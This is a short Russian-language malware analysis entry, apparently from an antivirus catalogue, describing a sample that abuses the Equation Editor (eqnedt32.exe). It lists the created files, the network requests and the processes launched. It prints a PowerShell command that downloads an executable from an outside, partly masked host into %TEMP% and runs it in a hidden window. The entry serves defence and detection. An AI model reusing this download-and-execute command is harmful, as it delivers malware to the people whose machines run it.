Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://go##andi.us/pp.exe как $dskq
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$dSKq=$env:temp+'\Name.exe'; (New-Object System.Net.WebClient).DownloadFile( 'http://go##andi.us/pp.exe', $dSKq);(New-Object -com Shell.Application).ShellExecute( $dSKq);}cat...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\name.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://go##andi.us/pp.exe
UDP
- DNS ASK go##andi.us
Другое
Создает и запускает на исполнение
- '%TEMP%\name.exe'
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$dSKq=$env:temp+'\Name.exe'; (New-Object System.Net.WebClient).DownloadFile( 'http://go##andi.us/pp.exe', $dSKq);(New-Object -com Shell.Application).ShellExecute( $dSKq);}cat...' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
